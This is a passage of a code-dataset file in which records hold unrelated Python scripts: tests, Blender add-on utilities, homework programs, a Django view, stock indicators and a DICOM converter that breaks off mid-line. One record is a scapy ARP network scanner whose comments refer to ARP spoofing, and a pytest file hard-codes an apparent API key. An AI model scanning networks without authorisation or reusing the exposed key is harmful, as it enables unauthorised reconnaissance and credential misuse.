self.files[0][\"link\"].endswith(\".zip\"):\n self._unpack_single_folder(self.files[0][\"link\"], output_folder)\n return\n\n for f in self.files:\n self.download_file(\n f[\"link\"],\n output_folder,\n file_name=f[\"name\"],\n file_size=f[\"size\"],\n file_hash=f[\"hash\"],\n file_hash_type=f[\"hash_type\"],\n )\n\n def download(\n self,\n output_folder: Union[Path, str],\n **kwargs,\n ):\n \"\"\"Download files for the given URL or record id.\n\n Arguments\n ---------\n record_id_or_url: str\n The identifier of the record or the url to the resource\n to download.\n output_folder: str\n The folder to store the downloaded results.\n version: str, int\n The version of the dataset\n\n \"\"\"\n Path(output_folder).mkdir(parents=True, exist_ok=True)\n\n self._get(output_folder, **kwargs)\n\n # store the location of the last known output folder\n self.output_folder = output_folder\n\n return self\n","sub_path":"datahugger/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":10641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"499853023","text":"from math import sqrt, isnan\nimport numpy.random\nimport numpy as np\n\nimport pytest\n\nfrom numpy.testing import *\n\nfrom cryspy.unit_cell import (UnitCell,\n UnitCellLenghtsOrAnglesAreNotFeasibleError)\n\n\ndef test_construction():\n eps = 1e-15\n\n uc = UnitCell(1, 2, 3, 60, 120, 90)\n assert uc.a == 1\n assert uc.b == 2\n assert uc.c == 3\n assert uc.alpha == 60\n assert uc.beta == 120\n assert uc.gamma == 90\n assert abs(uc.volume - 3 * sqrt(2)) < eps\n\n uc = UnitCell(1, 1, 1, 60, 60, 60)\n assert abs(uc.volume - 1 / sqrt(2)) < eps\n\n for p in ((0, 1, 1, 85, 91, 98),\n (1, 1, 1, 66, 66, 0),\n (1, 1, 1, 55, 0, 55),\n (1, 1, 1, 0, 44, 44),\n (1, 1, 1, 60, 60, 130),\n ):\n with pytest.raises(UnitCellLenghtsOrAnglesAreNotFeasibleError):\n UnitCell(*p)\n\ndef test_copy():\n from copy import copy\n uc = UnitCell(1, 2, 3, 87, 88, 89)\n uc1 = copy(uc)\n assert uc.parameters == uc1.parameters\n\ndef test_pickle():\n from pickle import dumps, loads\n uc = UnitCell(10, 20, 30, 100, 80, 110)\n uc1 = loads(dumps(uc))\n assert uc.parameters == uc1.parameters\n\ndef test_feasible_angles(trials=50000):\n marker = UnitCell(1,1,1,1,1,1)\n def uc(s):\n try:\n return UnitCell.from_sextuple(s)\n except UnitCellLenghtsOrAnglesAreNotFeasibleError:\n return marker\n angles = np.random.rand(trials, 3)\n angles *= 180\n lengths = np.ones((trials, 3))\n params = np.concatenate((lengths, angles), axis=1)\n cells = np.apply_along_axis(uc, axis=1, arr=params).ravel()\n invalidities = cells == marker\n\n # Remark in last paragraph of first column on p. 94 of ref [1] given\n # in the documentation of class UnitCell\n assert_almost_equal(np.count_nonzero(invalidities)/len(invalidities), 2/3,\n decimal=2)\n\n","sub_path":"cryspytests/test_unit_cell.py","file_name":"test_unit_cell.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"473117855","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n\nimport bpy\nimport math, mathutils\nfrom bpy.app.handlers import persistent\n\n\ncustom_nodes_type = [\"ColorCombineNodeType\",\n \"ColorPaletteNodeType\",\n \"ColorSplitNodeType\",\n \"ColorNodeType\",\n \"DataInputNodeType\",\n \"DataOutputNodeType\",\n \"DebugNodeType\",\n \"ExpressionNodeType\",\n \"DistanceNodeType\",\n \"FloatSwitchNodeType\",\n \"FloatToIntNodeType\",\n \"FloatToStringNodeType\",\n \"FloatNodeType\",\n \"IntToFloatNodeType\",\n \"NoteNodeType\",\n \"ObjectPropertiesNodeType\",\n \"RenderNodeType\",\n \"RenderLayersNodeType\",\n \"RoundNodeType\",\n \"TimeNodeType\",\n \"VectorSplitNodeType\",\n \"VectorNodeType\"]\n\ndef update_nodes(scene):\n #print (\"update_nodes\")\n \n # update compositing tree\n if scene.node_tree:\n for node in scene.node_tree.nodes:\n if node.bl_idname in custom_nodes_type:\n node.update()\n \n # update nodes in materials\n for material in bpy.data.materials:\n if material.node_tree != None:\n for node in material.node_tree.nodes:\n if node.bl_idname in custom_nodes_type:\n node.update()\n\n # update custom node trees\n for tree in bpy.data.node_groups:\n for node in tree.nodes:\n if node.bl_idname in custom_nodes_type:\n node.update()\n\n\n\ndef update_compositing_tree(scene, object, custom_nodes_type):\n if scene.use_nodes:\n for node in scene.node_tree.nodes:\n if node.bl_idname in custom_nodes_type:\n if node.bl_idname == \"ObjectPropertiesNodeType\":\n if node.data_item == object.name:\n # update node property from scene object\n node.update_props_from_object()\n node.update()\n\ndef update_material_tree(scene, object, custom_nodes_type):\n for material in bpy.data.materials:\n if material.node_tree != None:\n for node in material.node_tree.nodes:\n if node.bl_idname in custom_nodes_type:\n if node.bl_idname == \"ObjectPropertiesNodeType\":\n # update node property from scene object\n node.update_props_from_object()\n node.update()\n\ndef update_world_tree(scene, object, custom_nodes_type):\n for world in bpy.data.worlds:\n if world.use_nodes:\n for node in scene.world.node_tree.nodes:\n if node.bl_idname in custom_nodes_type:\n if node.bl_idname == \"ObjectPropertiesNodeType\":\n if node.data_item == object.name:\n # update node property from scene object\n node.update_props_from_object()\n node.update()\n\ndef update_custom_tree(scene, object, custom_nodes_type):\n for tree in bpy.data.node_groups:\n for node in tree.nodes:\n if node.bl_idname in custom_nodes_type:\n if node.bl_idname == \"ObjectPropertiesNodeType\":\n # update node property from scene object\n node.update_props_from_object()\n node.update()\n\n\n@persistent\ndef frame_change(scene):\n #print (\"frame_change\")\n update_nodes(scene)\n\n@persistent\ndef scene_update(scene):\n #print (\"scene_update\")\n check_objects = bpy.data.objects.is_updated\n check_scene = bpy.context.scene.is_updated\n \n if check_objects:\n #print (\"check_objects\")\n for object in bpy.data.objects:\n if object.is_updated:\n #print (\"check_object\", object)\n update_compositing_tree(scene, object, custom_nodes_type)\n update_material_tree(scene, object, custom_nodes_type)\n update_world_tree(scene, object, custom_nodes_type)\n update_custom_tree(scene, object, custom_nodes_type)\n \n if check_scene:\n #print (\"check_scene\")\n for object in bpy.data.objects:\n update_compositing_tree(scene, object, custom_nodes_type)\n update_material_tree(scene, object, custom_nodes_type)\n update_world_tree(scene, object, custom_nodes_type)\n update_custom_tree(scene, object, custom_nodes_type)\n \n \n \n ### node tree update ###\n '''\n # update compositing tree\n tree = scene.node_tree\n if scene.use_nodes:\n if tree.is_updated:\n update_nodes(scene)\n \n # update nodes in materials\n for material in bpy.data.materials:\n if material.use_nodes:\n if material.is_updated:\n update_nodes(scene)\n \n # update custom node trees\n for tree in bpy.data.node_groups:\n if tree.is_updated:\n update_nodes(scene)\n '''\n \n \n \n \n \n \n@persistent\ndef render_pre_update(scene):\n \n RenderNodeType = [\"RenderNodeType\"]\n # update compositing tree\n if scene.use_nodes:\n for node in scene.node_tree.nodes:\n if node.bl_idname in RenderNodeType:\n node.on_render = 1\n node.update()\n \n # update nodes in materials\n for material in bpy.data.materials:\n if material.node_tree != None:\n for node in material.node_tree.nodes:\n if node.bl_idname in RenderNodeType:\n node.on_render = 1\n node.update()\n \n # update custom node trees\n for tree in bpy.data.node_groups:\n for node in tree.nodes:\n if node.bl_idname in RenderNodeType:\n node.on_render = 1\n node.update()\n \n@persistent\ndef render_post_update(scene):\n \n RenderNodeType = [\"RenderNodeType\"]\n # update compositing tree\n if scene.use_nodes:\n for node in scene.node_tree.nodes:\n if node.bl_idname in RenderNodeType:\n node.on_render = 0\n node.update()\n \n # update nodes in materials\n for material in bpy.data.materials:\n if material.node_tree != None:\n for node in material.node_tree.nodes:\n if node.bl_idname in RenderNodeType:\n node.on_render = 0\n node.update()\n \n # update custom node trees\n for tree in bpy.data.node_groups:\n for node in tree.nodes:\n if node.bl_idname in RenderNodeType:\n node.on_render = 0\n node.update()\n\n\n\n\ndef send_value(outputs, value):\n for output in outputs:\n for link in output.links:\n \n if not link.is_valid:\n continue\n \n # REROUTE\n if link.to_node.type == 'REROUTE':\n reroute = link.to_node\n send_value(reroute.outputs, value)\n \n \n elif output.type == link.to_socket.type:\n # assign value to connected socket\n link.to_socket.default_value = value\n # update connected target nodes\n link.to_node.update()\n \n # convert types\n #elif output.type == \"RGBA\" and link.to_socket.type == \"VALUE\":\n #link.to_socket.default_value = value[0]\n #link.to_node.update()\n #elif output.type == \"VECTOR\" and link.to_socket.type == \"VALUE\":\n #link.to_socket.default_value = value[0]\n #link.to_node.update()\n #elif output.type == \"VALUE\" and link.to_socket.type == \"RGBA\":\n #link.to_socket.default_value[0] = value\n #link.to_socket.default_value[1] = value\n #link.to_socket.default_value[2] = value\n #link.to_socket.default_value[3] = value\n #link.to_node.update()\n #elif output.type == \"VALUE\" and link.to_socket.type == \"VECTOR\":\n #link.to_socket.default_value[0] = value\n #link.to_socket.default_value[1] = value\n #link.to_socket.default_value[2] = value\n #link.to_node.update()\n \n else:\n ok = None\n \n if output.type == \"VALUE\" and link.to_socket.type == \"BOOLEAN\":\n ok = True\n elif output.type == \"VALUE\" and link.to_socket.type == \"INT\":\n ok = True\n elif output.type == \"BOOLEAN\" and link.to_socket.type == \"VALUE\":\n ok = True\n elif output.type == \"BOOLEAN\" and link.to_socket.type == \"INT\":\n ok = True\n elif output.type == \"INT\" and link.to_socket.type == \"VALUE\":\n ok = True\n elif output.type == \"INT\" and link.to_socket.type == \"BOOLEAN\":\n ok = True\n \n if ok:\n link.to_socket.default_value = value\n link.to_node.update()\n \n \n \ndef send_value_link(link, value):\n if link.is_valid:\n # REROUTE\n if link.to_node.type == 'REROUTE':\n reroute = link.to_node\n reroute_links = reroute.outputs[0].links\n for reroute_link in reroute_links:\n send_value(reroute_link, value)\n\n #elif output.type == link.to_socket.type:\n else:\n # assign value to connected socket\n link.to_socket.default_value = value\n # update connected target nodes\n link.to_node.update()\n\n","sub_path":"addons/data_nodes/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"398776561","text":"#-------------------------------------------------#\r\n# Title: Working with Dictionaries\r\n# Dev: Samantha Chang\r\n# Date: April 28, 2019\r\n# ChangeLog: (Who, When, What)\r\n#-------------------------------------------------#\r\n\r\n#-- Data --#\r\n# declare variables and constants\r\n# objFile = An object that represents a file\r\n# strData = A row of text data from the file\r\n# dicRow = A row of data separated into elements of a dictionary {Task,Priority}\r\n# lstTable = A dictionary that acts as a 'table' of rows\r\n# strMenu = A menu of user options\r\n# strChoice = Capture the user option selection\r\n\r\n#-- Input/Output --#\r\n# User can see a Menu (Step 2)\r\n# User can see data (Step 3)\r\n# User can insert or delete data(Step 4 and 5)\r\n# User can save to file (Step 6)\r\n\r\n#-- Processing --#\r\n# Step 1\r\n# When the program starts, load the any data you have\r\n# in a text file called ToDo.txt into a python Dictionary.\r\n\r\n# Step 2\r\n# Display a menu of choices to the user\r\n\r\n# Step 3\r\n# Display all todo items to user\r\n\r\n# Step 4\r\n# Add a new item to the list/Table\r\n\r\n# Step 5\r\n# Remove a new item to the list/Table\r\n\r\n# Step 6\r\n# Save tasks to the ToDo.txt file\r\n\r\n# Step 7\r\n# Exit program\r\n#-------------------------------\r\n\r\n# Step 1 - Load data from a file\r\n # When the program starts, load each \"row\" of data \r\n # in \"ToDo.txt\" into a python Dictionary.\r\n # Add the each dictionary \"row\" to a python list \"table\"\r\n\r\ntodoFile = open('ToDo.txt', 'r')\r\ndicTask = {}\r\nlstTable = []\r\n\r\nfor line in todoFile:\r\n strTask = line.strip().split(',')[0]\r\n strPriority = line.strip().split(',')[1]\r\n dicTask = {'Task':strTask, 'Priority':strPriority}\r\n lstTable.append(dicTask)\r\n\r\ntodoFile.close()\r\n\r\nstrMenu = \"\"\"\r\n Menu of Options\r\n 1) Show current data\r\n 2) Add a new item.\r\n 3) Remove an existing item.\r\n 4) Save Data to File\r\n 5) Exit Program\r\n \"\"\"\r\n\r\n# Step 2 - Display a menu of choices to the user\r\nwhile(True):\r\n print(strMenu)\r\n strChoice = str(input(\"Which option would you like to perform? [1 to 4] - \"))\r\n\r\n # Step 3 -Show the current items in the table\r\n if (strChoice.strip() == '1'):\r\n print(lstTable)\r\n continue\r\n # Step 4 - Add a new item to the list/Table\r\n elif(strChoice.strip() == '2'):\r\n strTask = input('Enter a new task:')\r\n strPriority = input('Enter a priority:')\r\n\r\n dicNew = {\"Task\":strTask, \"Priority\":strPriority}\r\n lstTable.append(dicNew)\r\n print(\"You have added a new task to the table.\", dicNew)\r\n print(\"The table now shows\", lstTable)\r\n continue\r\n # Step 5 - Remove a new item to the list/Table\r\n elif(strChoice == '3'):\r\n RmvItem = input(\"Enter a task to remove: \")\r\n indexNo = 0\r\n for eachDic in lstTable:\r\n if eachDic['Task'] == RmvItem:\r\n lstTable.pop(indexNo)\r\n print(\"You have removed a task from the table.\", RmvItem)\r\n print(\"The table now shows\", lstTable)\r\n indexNo = indexNo + 1\r\n continue\r\n # Step 6 - Save tasks to the ToDo.txt file\r\n elif(strChoice == '4'):\r\n open(\"Todo.txt\", \"w\").close()\r\n objFile = open(\"Todo.txt\", \"a\")\r\n for eachDic in lstTable:\r\n strLine = eachDic['Task'] + ',' + eachDic['Priority'] + '\\n'\r\n objFile.write(strLine)\r\n objFile.close()\r\n print('Your data is saved. Go to Todo.txt file for review.')\r\n continue\r\n elif (strChoice == '5'):\r\n print(\"You chose to exit the program. Exiting the program.\")\r\n break #and Exit the program","sub_path":"Assigment05.py","file_name":"Assigment05.py","file_ext":"py","file_size_in_byte":3591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"499566116","text":"#!/usr/bin/env python\r\nimport scapy.all as scapy#1 download this to implement this \r\n# first need to creat packet asking who has this ip and broadcasting it using broadcast address dest mac=broadcast mac\r\n# use arp to do\r\nimport argparse#same as optparse but successor of optparse so use argparse simply replace arg=opt and argument=option\r\ndef get_arguments():#13 \r\n parser=argparse.ArgumentParser()\r\n parser.add_argument(\"-t\", \"--target\", dest=\"target\", help=\"target IP/IP range\")\r\n # (options,arguments)=parser.parse_args()#13 argparse only return options so\r\n options = parser.parse_args()\r\n return options\r\n\r\ndef scan(ip):\r\n # first creaate packet using scapy\r\n arp_request=scapy.ARP(pdst=ip)#2 ,6 for setting pdst\r\n # arp_request.show()# to get more info than summary do after set pdst\r\n # arp_request.pdst=ip#5 to set for particular ip rather than 0.0.0.0 in 3 ie summary but alternet way to set is in 2 ie when obj created\r\n # print(arp_request.summary())#3 give summary of\r\n # scapy.ls(scapy.ARP())#4 used to list values which can be used to set them eg pdst in list to ip\r\n broadcast=scapy.Ether(dst=\"ff:ff:ff:ff:ff:ff\")#7 for setting broadcast address in packet which require ethernet frame\r\n # broadcast.show()# do after set dst\r\n # print(broadcast.summary())#7 similar for arp obj\r\n # scapy.ls(scapy.Ether())#7 similar for arp obj ,set dest\r\n # broadcast.dst=\"ff:ff:ff:ff:ff:ff\"#8 or direct set in obj look up set broadcast address\r\n # print(broadcast.summary())#8 get value for mac os source and dest as broadcast\r\n arp_request_broadcast=broadcast/arp_request#combine 2 packet to form one packet to send containing both ip and broadcast mac\r\n # arp_request_broadcast.show()#9\r\n answered_list,unanswered_list=scapy.srp(arp_request_broadcast,timeout=1)#10 for send the packetand receive the outcome as ans and unans\r\n #here ether address is broadcast so it go to righ direction of same subnet devices\r\n #if you have used different mac and config some value in ls than it would have gone to that device and received response for other purpose\r\n #timeout is no of sec so program dont go death waiting outcome or response in same line and not proceeding\r\n #there is also sr function but srp is used to send packet with customn ether part \r\n # two response answered and unanswered packet use ans ,unans contain more data print and look\r\n # print(answered_list.summary())\r\n\r\n #error due to verbose not used as in arp spoof py script\r\n print(\"IP\\t\\t\\tMAC Address\\n...........................................\")\r\n for element in answered_list:\r\n print(element[1].psrc + \"\\t\\t\" + element[1].hwsrc)\r\n \r\noptions=get_arguments() \r\nscan(options.target)\r\n\r\n# run like ./network1_scanner.py -t 10.0.2.3/24\r\n# pip3 install scapy-python3","sub_path":"network1_scanner.py","file_name":"network1_scanner.py","file_ext":"py","file_size_in_byte":2842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"457602645","text":"import time\nimport RPi.GPIO as GPIO\n \nMONITOR_PIN = 18\n \nclass MotionSensor:\n\n def detect(self):\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(MONITOR_PIN, GPIO.IN)\n try:\n new = 1\n while True:\n old = new\n new = GPIO.input(MONITOR_PIN)\n #print(new, old)\n if old - new == 1:\n return True\n time.sleep(0.1)\n except KeyboardInterrupt:\n print('stop')\n finally:\n GPIO.cleanup()\n\nif __name__ == \"__main__\":\n pir = MotionSensor()\n #pir.scan()\n","sub_path":"pir.py","file_name":"pir.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"358397213","text":"# -*- coding: utf-8 -*-\nimport pytest\nimport requests\n\n\nclass Test_Class:\n def test_one(self):\n url1 = 'http://v.juhe.cn/telecode/to_telecodes.php'\n data = {'chars': '北京', 'key': 'e23273293b709acd3be5b9d66598179b'}\n res = requests.post(url1, data)\n print(res.status_code)\n print(res.text)\n","sub_path":"pytest_api_test/common/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"89199880","text":"# -*- coding: utf-8 -*-\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, get_object_or_404\n\nfrom association.models import Association\nfrom pr.models import Clip\n\n\n@login_required\ndef clips(request):\n association = get_object_or_404(Association, pseudo=\"pr\")\n pr = Association.objects.filter(id=30)[0]\n if request.user.profile.en_premiere_annee() and pr.is_hidden_1A:\n clip_list = []\n else:\n clip_list = Clip.objects.all()\n\n return render(\n request,\n 'pr/clips.html',\n {\n 'clip_list': clip_list,\n 'association': association,\n },\n )\n","sub_path":"pr/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"464164214","text":"import numpy as np\nimport pandas as pd\nfrom sklearn import linear_model\n\nDATE_OUTPUT_FORMAT = '%Y%m%d%H%M%S'\nREG_MODEL = linear_model.LinearRegression()\n\nBB_MEAN_COL_TEMP = '__bb_mean_col'\nBB_STD_COL_TEMP = '__bb_std_dev_col'\n\n\ndef chain(df):\n return Indicators(df)\n\n\nclass Indicators:\n\n def __init__(self, df):\n self.df = df\n\n def sma(self, period=30, name=None):\n name = 'sma{0}'.format(period) if name is None else name\n\n self.df[name] = self.df['close'].rolling(period).mean()\n return self\n\n def bollinger_band(self, period=30, n_std=2, upper_name=None, lower_name=None):\n\n upper_name = 'BB{0}Upper'.format(n_std) if upper_name is None else upper_name\n lower_name = 'BB{0}Lower'.format(n_std) if lower_name is None else lower_name\n\n self.df[BB_MEAN_COL_TEMP] = self.df['close'].rolling(period).mean()\n self.df[BB_STD_COL_TEMP] = self.df['close'].rolling(period).std()\n self.df[upper_name] = self.df[BB_MEAN_COL_TEMP] + n_std * self.df[BB_STD_COL_TEMP]\n self.df[lower_name] = self.df[BB_MEAN_COL_TEMP] - n_std * self.df[BB_STD_COL_TEMP]\n\n del self.df[BB_MEAN_COL_TEMP]\n del self.df[BB_STD_COL_TEMP]\n return self\n\n def linear_regression(self, period=10, name=None):\n name = 'RegLine{0}'.format(period) if name is None else name\n\n self.df[name] = self.df['close'].rolling(period).apply(Indicators._linear_regression_value)\n return self\n\n def drop_nan(self):\n self.df = self.df.dropna()\n return self\n\n def to_dict(self):\n self.df = self.df.reset_index()\n self.df['datetime'] = pd.to_numeric(self.df['datetime'].dt.strftime(DATE_OUTPUT_FORMAT))\n return self.df.to_dict(orient='records')\n\n @staticmethod\n def _linear_regression_value(data_list):\n data_size = data_list.size\n x_axis = np.array([range(data_list.size)]).T\n REG_MODEL.fit(x_axis, np.array(data_list))\n return REG_MODEL.predict(np.array(data_size))[0]\n","sub_path":"stocks/indicators/indicators.py","file_name":"indicators.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"199205228","text":"#!/usr/bin/python3\n\nimport cgi\nimport html\nimport cgitb\ncgitb.enable()\n\n\ndef load_and_display(html, param_dict={}):\n with open(html) as f:\n data = f.read()\n print(\"Content-type: text/html\\n\")\n print(data % param_dict, end=\"\")\n\n \ndef load_results(file_name):\n with open(file_name) as f:\n lines = f.readlines()\n all_lines = html.escape(\"\\n\".join(lines))\n return all_lines.replace(\"\\n\", \"
\")\n \n\n\nresults = load_results(\"results.txt\")\nload_and_display(\"results.html\", vars())\n\n","sub_path":"lesson_python_file_and_web/cgi-bin/results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"322765908","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 19 16:35:08 2018\n\n@author: joeldavidson\n\"\"\"\n\nimport random\nimport matplotlib.pyplot as plt\nfrom collections import defaultdict as dic\n\n#create a dictionary as the adjacency list\nG = dic(list)\n\n'''\nBFS is a function that takes adjacency list G and vertices s and t\nand returns pair d (distance s to t), and k (number of nodes popped off)\n'''\n\n#4.a\n\ndef BFS(G,s,t):\n Q = [] # queue of vertices\n Q.append(s)\n \n #create a list of length of all elements and keys in G\n visited = [0] * (sum([len(v)+1 for k, v in G.items()]))\n #visited[s] = 1\n k = 0\n \n dist = [0] * len(visited)\n if s == t:\n return(0,0)\n while Q:\n s = Q.pop(0)\n k +=1\n \n for i in G[s]:\n if visited[i] == 0:\n dist[i] = dist[s] + 1\n Q.append(i)\n visited[i] = 1\n if i == t:\n return(dist[i],k)\n return(0,0)\n\n\n\n\n\n\n\n#4.b\n\ndef BiBFS(G,s,t):\n Q_s = [] # queue of vertices\n Q_s.append(s)\n Q_t = [] \n Q_t.append(t)\n \n #create two lists of length of all elements and keys in G + 10 so it is long enough\n visited_s = [False] * (sum([len(v)+1 for k, v in G.items()])+10)\n visited_s[s] = True\n visited_t = [False] * (sum([len(v)+1 for k, v in G.items()])+10)\n visited_t[t] = True\n k = 0\n \n \n dist_s = [0] * len(visited_s)\n dist_t = [0] * len(visited_t)\n if s == t:\n return(0,0)\n \n while Q_s and Q_t:\n if Q_s:\n \n s = Q_s.pop(0)\n k +=1\n \n #check all the vertices connected to s\n for i in G[s]:\n if visited_s[i] == False:\n dist_s[i] = dist_s[s] + 1\n Q_s.append(i)\n visited_s[i] = True\n \n #if the current vertex has been visited by the BFS from t, there is a path from s to t\n if visited_t[i] == True:\n return(dist_s[i]+dist_t[i],k)\n \n if Q_t:\n \n t = Q_t.pop(0)\n k += 1\n \n for j in G[t]:\n if visited_t[j] == False:\n dist_t[j] = dist_t[t] + 1\n Q_t.append(j)\n visited_t[j] = True\n \n if visited_s[j] == True:\n return(dist_s[j]+dist_t[j],k)\n #print(\"no path\")\n return(0,0)\n\n\n#input for testing\nG[1].append(2)\nG[2].append(1)\nG[1].append(3)\nG[3].append(1)\nG[2].append(4)\nG[4].append(2)\nG[2].append(5)\nG[5].append(2)\nG[3].append(6)\nG[6].append(3)\nG[3].append(7)\nG[7].append(3)\nG[7].append(8)\nG[8].append(7)\n\nprint(\"BFS test: \", BFS(G,1,8))\nprint(\"BiBFS test: \",BiBFS(G,1,8))\n\n\n\n\n#4.c.ii\n\n#function to create a binary tree of height n\ndef BinTreeBuilder(n):\n nodes = (2**(n-1))-1\n BT = dic(list)\n for i in range(1,nodes+1):\n #add the connection to the graph in both directions so it is an undirected graph\n BT[i].append(i*2)\n BT[i*2].append(i)\n BT[i].append((i*2)+1)\n BT[(i*2)+1].append(i)\n return BT\n\n\n\n\n\nK1List = []\nD1List = []\nK2List = []\nD2List = []\nnList = []\nfor i in range(3,16):\n BT = BinTreeBuilder(i)\n \n x,y = BFS(BT,1,len(BT))\n nList.append(i)\n D1List.append(x)\n K1List.append(y)\n \n q,r = BiBFS(BT,1,len(BT))\n D2List.append(q)\n K2List.append(r)\n \n \n''' \nprint(\"This is k1\", K1List)\nprint(\"This is d1\", D1List)\nprint(\"This is k2\", K2List)\nprint(\"This is d2\", D2List)\n'''\n\n\n\nax = plt.subplot()\nax.set(xlabel='n', ylabel='k', title='Binary Tree')\nplt.plot(nList, K1List)\nplt.plot(nList, K2List)\nplt.show()\n\n\n#4.c.iii\ndef RandGraphBuilder(n):\n #create a 2d list to keep track of vertices already visited\n Rvisited = [0] * n\n for i in range(n):\n Rvisited[i] = [0] * n\n #G is the dictionary that is the adjacency list\n G = dic(list)\n for i in range (0,n):\n for j in range (0,n):\n if not Rvisited[i][j] and not Rvisited[j][i]:\n Rvisited[i][j] = 1\n Rvisited[j][i] = 1\n e = random.randint(0, 1)\n if e:\n G[i].append(j)\n G[j].append(i)\n return G\n \nprint(\"This is the d and k value for BFS on the random graph w/ n = 20\", RandGraphBuilder(20))\nprint(BFS(RandGraphBuilder(20),1,2))\n\nprint(\"This is the d and k value for Bi-directional BFS on the random graph w/ n = 20\")\nprint(BiBFS(RandGraphBuilder(20),1,2))\n\n\nRandK1 = []\nRandK2 = []\nRandD1 = []\nRandD2 = []\nRandn = []\n\n#run the test n = {3,4...20} 50 times and take the average k results\nfor n in range(3,20):\n xavg = 0\n yavg = 0\n qavg = 0\n ravg = 0\n Randn.append(n)\n for i in range(0,50):\n RG = RandGraphBuilder(n)\n x,y = BFS(RG,1,2)\n \n q,r = BiBFS(RG,1,2)\n \n xavg += x\n yavg += y\n qavg += q\n ravg += r\n \n RandD1.append(xavg/50)\n RandK1.append(yavg/50)\n RandD2.append(qavg/50)\n RandK2.append(ravg/50)\n\nax = plt.subplot()\nax.set(xlabel='n', ylabel='k', title='Random Graph')\nplt.plot(Randn, RandK1)\nplt.plot(Randn, RandK2)\nplt.show()\n\n\n","sub_path":"BreadthFirstSearch.py","file_name":"BreadthFirstSearch.py","file_ext":"py","file_size_in_byte":5283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"104968878","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# %%\n\"\"\"\nCreated on Sep 2, 2021\n\n@author: Or Duek\nA short script that will convert to NIFTI.GZ (from raw DICOM data) and then create a BIDS compatible structure\n\"\"\"\n\n# convert to NIFTI\nimport os \nfrom nipype.interfaces.dcm2nii import Dcm2niix\nimport shutil\n\n# %% Convert functions Converts DICOM to NIFTI.GZ\ndef convert (source_dir, output_dir, subName, session): # this is a function that takes input directory, output directory and subject name and then converts everything accordingly\n try:\n os.makedirs(os.path.join(output_dir, subName, session))\n except:\n print (\"folder already there\")\n# try:\n# os.makedirs(os.path.join(output_dir, subName, ))\n# except:\n# print(\"Folder Exist\") \n converter = Dcm2niix()\n converter.inputs.source_dir = source_dir\n converter.inputs.compression = 7\n converter.inputs.output_dir = os.path.join(output_dir, subName, session)\n converter.inputs.out_filename = subName + 'seriesNo' '_' + '%2s' + '%p'\n converter.run()\n\n# %% Check functions\ndef checkGz (extension):\n # check if nifti gz or something else\n if extension[1] =='.gz':\n return '.nii.gz'\n else:\n return extension[1]\n\ndef checkTask(filename):\n\t\n nameTask = filename.split('seriesNo_')[1].split('cmrr')[0]#.replace('-', '')\t \n\t\n return nameTask\n\n\n# %%\ndef organizeFiles(output_dir, subName, session):\n \n fullPath = os.path.join(output_dir, subName, session)\n os.makedirs(fullPath + '/dwi')\n os.makedirs(fullPath + '/anat') \n os.makedirs(fullPath + '/func')\n os.makedirs(fullPath + '/misc') \n \n a = next(os.walk(fullPath)) # list the subfolders under subject name\n\n # run through the possibilities and match directory with scan number (day)\n for n in a[2]:\n print (n)\n b = os.path.splitext(n)\n # add method to find (MB**) in filename and scrape it\n if n.find('diff')!=-1:\n print ('This file is DWI')\n shutil.move((fullPath +'/' + n), fullPath + '/dwi/' + n)\n os.rename((os.path.join(fullPath, 'dwi' ,n)), (fullPath + '/' + 'dwi' +'/' + subName + '_' + session +'_dwi' + checkGz(b)))\n \n elif n.find('MPRAGE')!=-1:\n print (n + ' Is Anat')\n shutil.move((fullPath + '/' + n), (fullPath + '/anat/' + n))\n os.rename(os.path.join(fullPath,'anat' , n), (fullPath + '/anat/' + subName+ '_' + session + '_acq-mprage_T1w' + checkGz(b)))\n elif n.find('t1_flash')!=-1:\n print (n + ' Is Anat')\n shutil.move((fullPath + '/' + n), (fullPath + '/anat/' + n))\n os.rename(os.path.join(fullPath,'anat' , n), (fullPath + '/anat/' + subName+ '_' + session + '_acq-flash_T1w' + checkGz(b)))\n elif n.find('t1_fl2d')!=-1:\n print (n + ' Is Anat')\n shutil.move((fullPath + '/' + n), (fullPath + '/anat/' + n))\n os.rename(os.path.join(fullPath,'anat' , n), (fullPath + '/anat/' + subName+ '_' + session + '_acq-fl2d1_T1w' + 